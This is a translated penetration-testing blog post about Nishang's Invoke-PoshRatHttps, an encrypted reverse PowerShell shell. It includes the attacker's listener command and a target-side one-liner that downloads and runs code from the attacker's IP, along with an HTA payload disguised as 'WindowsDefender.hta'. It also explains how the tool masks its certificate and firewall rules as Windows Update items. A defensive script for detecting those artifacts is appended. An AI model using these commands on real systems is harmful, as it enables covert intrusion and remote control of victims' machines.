Week of PowerShell Shells, Day 3: HTTPS shell
Welcome to the third day of the Week of PowerShell Shells. Today we discuss HTTP/HTTPS shells.
We usually use HTTPS for security reasons, and it is precisely because of this that HTTPS traffic is often given little scrutiny by system administrators or security staff. That makes HTTPS an ideal channel for a shell. Here I have borrowed the PoshRat of Casey Smith (@subTee), made some modifications, and released the result as Invoke-PoshRatHttps.
Invoke-PoshRatHttps, as its name implies, establishes an encrypted channel between the target and the attacker, something the shells from the previous two days lacked. You can find it in the Shells directory of Nishang: https://github.com/samratashok/nishang.
Invoke-PoshRatHttps requires administrator privileges on the attacker's machine in order to listen on the ports and install the SSL certificate. First, we start the listener on that machine:
PS C:\> Invoke-PoshRatHttps -IPAddress 192.168.254.1 -Port 80 -SSLPort 443
Note: the listener needs two ports, one to initialize the connection and the other for the encrypted communication.
On the target machine, we only need to execute the following command (note that the scheme is plain http):
PS C:\> Invoke-Expression (New-Object Net.WebClient).DownloadString('http://192.168.254.1/connect')
Alternatively, we can open the HTA file in a browser on the target machine; however, the various browser errors that may occur lower the success rate of this approach. The URL of the HTA file is:
https://192.168.254.1/WindowsDefender.hta
Let's take a look at the actual results:
Good, an encrypted interactive reverse PowerShell!
In Wireshark, we can see that apart from the initial connection request, which is HTTP, all other traffic is HTTPS. That initial HTTP request is used to set up the HTTPS encrypted channel.
The pcap can be downloaded from my Google Drive: https://drive.google.com/folderview? Id = shard & usp = sharing
(Note: The translator has moved the data packet to the domestic cloud disk link: http://pan.baidu.com/s/1i4ikCAD password: nw06)
Note that Invoke-PoshRatHttps installs a root certificate named "Windows Update Agent" and creates two firewall rules named "Windows Update HTTPS" and "Windows Update HTTP"; you must pass it the IP address and port numbers of your own machine.
The following is the HTTP version, Invoke-PoshRatHttp:
Because the Invoke-PoshRatHttps client is very small and can be combined with a variety of delivery techniques, it is very easy to use.
Finally, after using Invoke-PoshRatHttps, we can use Remove-PoshRat to clean up the traces it leaves. Note that Remove-PoshRat must be run from an elevated PowerShell.
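The certificate and firewall-rule names above are the artifacts a responder would look for on a host suspected of having run this listener, or would verify are gone after Remove-PoshRat. The following check is an added example, not code from Nishang or the original post; it assumes PowerShell 3 or later with the NetSecurity module (Windows 8 / Server 2012 or newer), and the names it searches for are taken from the text above.

```powershell
# Added example (not part of Nishang): audit a Windows host for the artifacts
# this post says Invoke-PoshRatHttps leaves behind. Run from an elevated prompt.
function Find-PoshRatArtifacts {
    [CmdletBinding()]
    param(
        # Names taken from the post; adjust if a variant renames them.
        [string]$CertSubject = 'Windows Update Agent',
        [string[]]$RuleNames = @('Windows Update HTTPS', 'Windows Update HTTP')
    )

    $findings = @()

    # 1. Trusted root certificates whose subject carries the name the tool installs.
    Get-ChildItem -Path Cert:\LocalMachine\Root |
        Where-Object { $_.Subject -like "*CN=$CertSubject*" } |
        ForEach-Object {
            $findings += [pscustomobject]@{
                Type   = 'RootCertificate'
                Name   = $_.Subject
                Detail = "Thumbprint $($_.Thumbprint), NotAfter $($_.NotAfter)"
            }
        }

    # 2. Firewall rules with the display names the listener creates,
    #    including which local port each one opens.
    foreach ($name in $RuleNames) {
        Get-NetFirewallRule -DisplayName $name -ErrorAction SilentlyContinue |
            ForEach-Object {
                $port = ($_ | Get-NetFirewallPortFilter).LocalPort
                $findings += [pscustomobject]@{
                    Type   = 'FirewallRule'
                    Name   = $_.DisplayName
                    Detail = "Direction $($_.Direction), LocalPort $port, Enabled $($_.Enabled)"
                }
            }
    }

    return $findings
}

# No output means none of the named artifacts are present.
Find-PoshRatArtifacts | Format-Table -AutoSize
```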
Nishang has another HTTPS script Invoke-PsGcat, which uses Gmail to execute commands or scripts.